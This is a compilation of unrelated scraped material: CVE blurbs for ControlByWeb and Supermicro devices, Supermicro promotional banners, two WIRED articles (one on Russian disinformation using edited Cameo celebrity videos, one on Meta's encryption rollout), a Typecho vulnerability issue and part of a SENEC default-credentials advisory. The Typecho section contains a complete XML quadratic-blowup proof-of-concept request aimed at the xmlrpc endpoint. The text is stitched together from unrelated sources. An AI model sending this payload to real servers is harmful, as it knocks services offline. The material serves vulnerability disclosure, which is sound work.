
The affected ControlByWeb Relay products are vulnerable to a stored cross-site scripting vulnerability, which could allow an attacker to inject arbitrary scripts into the endpoint of a web interface that could run malicious javascript code during a user's session.






CVE-2023-6333

A web server in the Intelligent Platform Management Interface (IPMI) baseboard management controller (BMC) implementation on Supermicro X11 and M11 based devices, with firmware versions up to 3.17.02, allows remote unauthenticated users to perform directory traversal, potentially disclosing sensitive information.

**Ultimate Building Blocks for Data Center Acceleration**

Construct Your Tailored AI Solutions from the Largest NVIDIA MGX™ Systems Portfolio

**Empowering the Future of Content Production**

Supermicro and AMD Solutions Help Studios and Filmmakers Bring Magic to Life

**Accelerate Everything AI**

Introducing GPU Acceleration for a Complete Range of Enterprise Workloads

**New Generation**

Supermicro’s 15+ Server Families Will Support the Upcoming 5th Gen Intel® Xeon® Processors (Formerly Codenamed Emerald Rapids)

**Webinar Accelerate Everything  
in the Data Center  
and at the Edge**

A conversation about fast cars and faster servers with Timothy Prickett Morgan, Supermicro, and Intel®

**Open Storage Summit ’23**

Developing storage solutions to meet the demands of AI, HPC and data-intensive workloads

Starting from August 15th

**Rack Scale Solutions**

Accelerated Time-To-Delivery of Plug and Play Racks with Proven Quality and Reliability

**SuperBlade®**

Highest Performance with Advanced Networking and NVMe

**Twin Family**

Enterprise Optimized Hyper-Converged Infrastructure

**5G, IoT & Edge Computing**

Connecting the Intelligent World from Devices to the Cloud

**GPU Systems**

AI / Deep Learning and HPC Optimized Servers

**All-Flash EDSFF Storage**

Cloud-Density Storage Systems Optimized For Software-Defined Data Centers

**A+ Solutions (AMD EPYC™)**

Broadest Portfolio Optimized to Deliver Superior Performance

**Building Blocks**

Industry’s broadest selection of high quality hardware for fully application optimized server, storage, embedded/IoT, and workstation solutions

**Made in Silicon Valley**

The Wall Street Journal Conversation with Charles Liang, Founder, President & CEO, Supermicro and Ramin Beheshti, Former Chief Product & Technology Officer, Dow Jones

Watch Video

**JumpStart: Free Bare Metal Access to Supermicro Servers with the latest Intel® and AMD™ Processors**

**COMPUTEX ’23 Keynote: Charles Liang with Special Guest Jensen Huang**

**Rakuten Symphony – Powered by Supermicro 5G Systems**

**Rack Scale Plug and Play Solutions from Supermicro**

**Supermicro 5G Edge Solutions Empowering the Deskless Workforce with Taqtile and Intel**

**Data Center Refresh and Expansion**

**How On-Premises Deployment Can Overcome Six Critical AI Challenges**

**Harness the Power of AI with Supermicro and NVIDIA Omniverse Enterprise**

**A Journey to Make High-End Cloud Gaming Faster, More Secure & More Accessible**

Click here to use Legacy Supermicro.com Site

CVE-2023-33411: Supermicro Data Center Server, Blade, Data Storage, AI System

Videos featuring Elijah Wood, Mike Tyson, and Priscilla Presley have been edited to push anti-Ukraine disinformation, according to Microsoft researchers.

For around $340, actor Elijah Wood can record you a personalized video wishing you happy birthday. John McGinley, best known for his role in medical TV show _Scrubs_, will give you a lengthy pep talk for around $475. Priscilla Presley will record a clip talking about everything from Christmas shopping to Graceland for around $200.

These celebrities all use the video-sharing platform Cameo to quickly snap homemade videos for fans who pay them for the honor. They can be seen celebrating anniversaries, lightly roasting people, or offering advice. This summer, however, some videos have been weaponized by an unknown Russian group, which has crudely edited the clips and used them as part of its wide-ranging information warfare tactics against Ukraine.

At least seven seemingly unaware celebrities, including those listed above, have had their Cameo videos manipulated by pro-Russian actors to appear as if they are criticizing Ukrainian president Volodymyr Zelensky, according to new Microsoft research published today. The altered Cameo videos were shared on social media then heavily reported on by Russian government-owned or controlled newspapers and TV channels, the research says.

The videos started appearing in July and follow similar patterns. “It's at a regular interval,” says Clint Watts, the general manager of Microsoft Threat Analysis Center, which published the research in an update on Russian information and cyber activities. “It's a different actor or actress popping up saying a very similar script,” Watts says.

The videos often see the celebrity talking to “Vladimir” and saying they should get help with possible substance abuse. The videos are later edited to appear as if the celebrity were addressing Ukrainian president Volodymyr Zelensky—the Kremlin has consistently pushed disinformation calling Zelensky an addict. The videos can have emoji, links, and social handles added to them before they are shared on social media.

The seven celebrities Microsoft highlights are actors Elijah Wood, John McGinley, Dean Norris, Kate Flannery, and Priscilla Presley; musician Shavo Odadjian; and boxer Mike Tyson. There is no suggestion that the celebrities knew their videos would be edited or manipulated in this way.

“I just want to make sure you are getting help,” Wood, the former _Lord of the Rings_ actor, appears to say in the video. The manipulated video has a Ukrainian flag, a social media handle for Zelensky, and a link to a drug and alcohol research center, and has been made to look like it appeared on Instagram. The video has several jarring cuts throughout and is evidently altered. “I hope you get the help that you need. Lots of love, Vladimir, take care,” Wood seemingly says at the end of the footage. In another video, Kate Flannery, who starred in _The Office_, appears to say, “You need to go to the rehab,” and that Vladimir deserves a good life.

Over the past decade, Russian disinformation efforts have evolved to keep up with the current web trends, Watts says. Around the 2016 US elections, pro-Russian accounts were sharing their messages using blog post links. Watts says that the Cameo videos did not appear to have reached a wide audience, but the effort was “novel” and part of Russia’s ever-changing tactics. “It’s very hard to influence if you’re not in video, in the current era,” Watts says, adding that the Cameo videos were not edited to a high quality.

“The request was submitted through Cameo and was in no way intended to be addressed to Zelensky or have anything at all to do with Russia or Ukraine or the war,” says a representative for Elijah Wood. A spokesperson for boxer Mike Tyson says the video of him is “false” and he does not produce such content. “Anything outside of his usual lighthearted Cameo videos \[is\] being altered,” the representative says. Representatives for other celebrities in the Cameo videos did not immediately respond to requests for comment or could not be reached ahead of publication.

Brandon Kazimer, a spokesperson for Cameo, says it is the company’s policy not to comment on any trust and safety investigations. However, Kazimer says the kind of videos described in the research would violate the company’s community guidelines, and “Cameo will typically take steps to remove the problematic content and suspend the purchaser's account to help prevent further issues.”

Additional analysis of the Cameo videos shows how they spread through Russian government-owned or backed media outlets. Antibot4Navalny, an anonymous Russia-based disinformation research group, looked at mentions of the seven celebrities and the videos and found they appeared dozens of times in Russian media, which is largely state-backed or owned.

An Antibot4Navalny member, who was not involved in the Microsoft research, says it appears that one celebrity was targeted each week for nearly two months. The researcher says that Priscilla Presley’s video was mentioned on one of the biggest “prime-time political talk shows” in Russia. The “widest coverage, as measured by number of major media agencies mentioning \[them\], was received by John McGinley,” the researcher says. This included news service RT, which is sanctioned in Europe. They add that Russian fact-checking website Provereno has debunked several of the videos.

The Cameo videos are not the first time that pro-Russian actors have used celebrities to try and push their messages. This week, WIRED revealed how a notorious Russian disinformation effort called Doppelganger, which has links to Russian military intelligence, has been using images of celebrities, including Taylor Swift, Beyoncé, Oprah, Justin Bieber, and Cristiano Ronaldo, to promote anti-Ukraine messages on social media. The efforts reached more than 7.6 million people on Facebook in November, according to an analysis of ads on the platform.

The Antibot4Navalny researcher says people trust well-known, public figures, even if they are not an expert on a subject area. “This is exactly what is exploited by Russian media domestically, and in a quite similar way by Doppelganger operators targeting other countries,” the researcher says. “If you are out of experts saying what you need, just use a video footage (or a photo) with whoever looks familiar, and add subtitles, voiceover, or a written ‘quote,’ with whatever talking points you are seeking to amplify.”

“When the Russians are particularly successful is when they're quick and tied to current events and news stories,” says Microsoft’s Watts. In recent weeks, researchers, including those at Microsoft, have linked some disinformation about the Israel–Hamas war to Russian actors trying to capitalize on the moment. Videos faking news reports from the BBC and Bellingcat have been posted on Russian Telegram channels in the past two months. The videos, according to researchers, include false quotes attributed to Bellingcat founder Eliot Higgins and use a similar style to the BBC. The videos push messages incorrectly claiming that Ukraine is selling weapons to Hamas.

Most of the Russian narratives highlighted by recent research focus on discrediting Ukraine and its leadership as Russia’s full-scale war enters its second winter. However, next year, dozens of countries—including the US, EU, and UK—are set to hold elections. As this happens, Russian influence operations may also change course. Microsoft’s Watts says he expects that by March, one of the biggest concerns will be whether Russian malicious actors, including hacker groups, are targeting more European and North American targets to potentially conduct “hack and leak operations to drive narratives around any sort of political warfare that they want to pursue.”

Elijah Wood and Mike Tyson Cameo Videos Were Used in a Russian Disinformation Campaign

Mark Zuckerberg personally promised that the privacy feature would launch by default on Messenger and Instagram chat. WIRED goes behind the scenes of the company’s colossal effort to get it right.

Since 2016, the social behemoth now known as Meta has been working to deploy end-to-end encryption in its communication apps. CEO Mark Zuckerberg even promised in 2019 that the data privacy protection would roll out by default across all of the company's chat apps. In practice, though, it was a wildly ambitious goal fraught with technical and political challenges, and Meta has only been able to move toward it in gradual, incremental steps. But this week the company is finally starting its full rollout.

“It's been a wild ride," says Jon Millican, a software engineer within Meta's messenger privacy team. “I suspect this is the first time that something’s been end-to-end encrypted with all of the constraints that we’re working with. It’s not just that we’re migrating people’s data, but it’s actually that we're having to fundamentally change a bunch of the assumptions that they work with when they’re using the product.”

Meta has had to stake out a position as a committed proponent of end-to-end encryption amid pressure from law enforcement and victim advocacy groups that the privacy feature—which makes data unintelligible everywhere except on the devices of the sender and recipient—limits necessary oversight and impedes crucial police investigations. Meanwhile, the company has spent the past four years, not to mention the better part of a decade, developing the technology to retrofit two massive communication platforms—Messenger and Instagram chat—such that they could still offer the features and general experience users expect under the technical constraints and usability challenges of end-to-end encryption.

“I understand that many people don't think Facebook can or would even want to build this kind of privacy-focused platform—because frankly, we don't currently have a strong reputation for building privacy-protective services, and we've historically focused on tools for more open sharing,” Zuckerberg memorably wrote in his 2019 treatise. But he added that there was a clear desire from users to have access to private and secure encrypted communication services. “This is the future I hope we will help bring about,” he wrote.

Meta says that it will take some time for the rollout of full default end-to-end encryption to reach all Messenger and Instagram chat users, and the feature is still only launching for direct messages between two accounts. End-to-end encryption for group chats will continue to be opt-in for now. But these final delays have to do with gradually converting billions of accounts to run the cryptography and encrypted storage schemes that underly the effort. And while the infrastructure is new and had to be painstakingly tailored to Meta's services, the company says it built the system on the Signal Protocol and thoroughly vetted the implementation both internally and with independent experts. In the lead-up to this announcement, the company did a final round of outreach to privacy groups and cryptographers to show them the documentation and have them test the feature.

“It looks just like Messenger, except that under the hood it has really strong encryption,” says Matt Green, a Johns Hopkins cryptographer who previewed the launch a few weeks ago. “Getting things to work on the web seems like it was the hard part, but they pulled it off.”

The challenge of building end-to-end encrypted services has to do with the fact that such systems inherently blind the servers that enable them to the activity they are facilitating. In other words, these systems have to somehow stand in the hallway on the first day of school and tell each student which classes to go to and how to get there without knowing who any of the kids are or what their course schedule is.

This especially poses challenges for syncing people's messages across multiple devices or repopulating their messages on a new device. Some encrypted chat apps like Signal address this issue by storing all your messages locally on your device and then providing a tool that helps you transfer that data trove from one device to the next over Bluetooth when you, say, get a new phone and want to switch everything over. This approach doesn't preserve your history if you lose the device where the data is saved, and many users around the world don't have resources or access to devices with enough storage space to preserve messages locally. People may want to auto-delete messages anyway, but for users who want to save their history, such schemes can be impractical.

With these considerations in mind, Meta engineers developed an encrypted storage protocol, dubbed Labyrinth, that allows the company to store users' chat histories and other communication data on its servers for ease of use, but in a form that is always encrypted and inaccessible to the company.

“There are two things users will experience” in the transition, Gail Kent, Messenger's global policy director, tells WIRED. “They will be asked to create secure storage and create a pin that will then enable them to add the data and the messages onto other devices and restore if they lose their device. Yet nobody apart from them has access to that message content. It seems like a tiny thing, but the innovation behind it is pretty extraordinary. And then the second thing that they’ll see is a line in their conversations that says this message is now end-to-end encrypted. And when they start a new conversation, it will say that at the start of the conversation.”

Turning on end-to-end encryption for cloud services makes it harder for companies to assist their users with data recovery. It also requires thoughtful strategies for keeping systems usable while striking a balance with security. The challenge is one that companies like Apple have grappled with as well. Like many of its peers, Meta will offer multiple options for protecting and accessing Labyrinth secure storage, including setting a pin, storing a code in a third-party service like iCloud, or saving a 40-character recovery code.

Meta is also providing an option for people to use end-to-end encrypted communication without turning on secure storage at all if they want to store messages locally on one or all devices. Currently, the company isn't offering a mechanism to transfer this local data onto other devices. A core component of Labyrinth, though, is what's known in cryptography as a “key rotation” system for revoking a device's access and keeping it from viewing or sending messages on an account if a user wants to remove it.

Meta's engineers have spent a huge amount of time over the past four years re-architecting more than 100 Messenger and Instagram chat features so they interoperate with end-to-end encryption and seem to function the same way they always have—even if they're working differently on a technical level under the hood. Extra features like themes, custom reactions, and emojis are all preserved. The company also announced new features this week like the ability to edit a message and control whether other users see a read receipt once you've viewed a message.

Initial reactions to the launch have already begun to mirror the broader controversy around end-to-end encryption, with privacy advocates lauding the move and law enforcement and victim defense groups, particularly those that aim to address online child sexual abuse, condemning the step. After years of receiving both sympathy and criticism about the scale and scope of the project, though, Meta is finally, really taking the plunge.

“The technical complexity was just extraordinary, and it's even more complex when you are doing it for well over a billion users who don’t stop using the app to let you re-create it,” Meta's Kent says. But at the same time, she adds, “we’re increasing the security, safety, and privacy for well over a billion people, and that’s a pretty amazing feat.”

End-to-End Encrypted Instagram and Messenger Chats: Why It Took Meta 7 Years

Typecho v1.2.1 was discovered to be vulnerable to an XML Quadratic Blowup attack via the component /index.php/action/xmlrpc.

    POST /index.php/action/xmlrpc HTTP/1.1
    Content-Length: 83630
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Encoding: gzip,deflate,br
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Host: 192.168.160.147
    Connection: Keep-alive
    
    <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE lolz [
     <!ENTITY poc "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.............">
    ]>
    <methodCall>
      <methodName>aaa&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;</methodName>
      <params>
       <param><value>aa</value></param>
       <param><value>aa</value></param>
      </params>
    </methodCall>

CVE-2023-49967: Typecho v1.2.1 XML Blowup Attack DoS vulnerability · Issue #1648 · typecho/typecho

The affected devices use publicly available default credentials with administrative privileges.

**Full Disclosure mailing list archives**

_From_: Phos4Me via Fulldisclosure <fulldisclosure () seclists org>  
_Date_: Fri, 10 Nov 2023 07:12:31 +0000  

> > Advisory ID: Ph0s-2023-004
> > Product: EnBw - SENEC legacy storage box: V1-V3
> > Manufacturer: SENEC - a part of EnBw
> > Affected Version(s): Firmware: all (as of 2023-06-19)
> > Tested Version(s): current
> > Vulnerability Type: CWE-1392: Use of Default Credentials

> > Risk Level:
> > CVSS v3.1 Vector:
> > AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (9.8 Critical)

> > Manufacturer Risk Level Rating:
> > AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L/E:H/RL:U/RC:C
> > Overall CVSS Score: 8.6

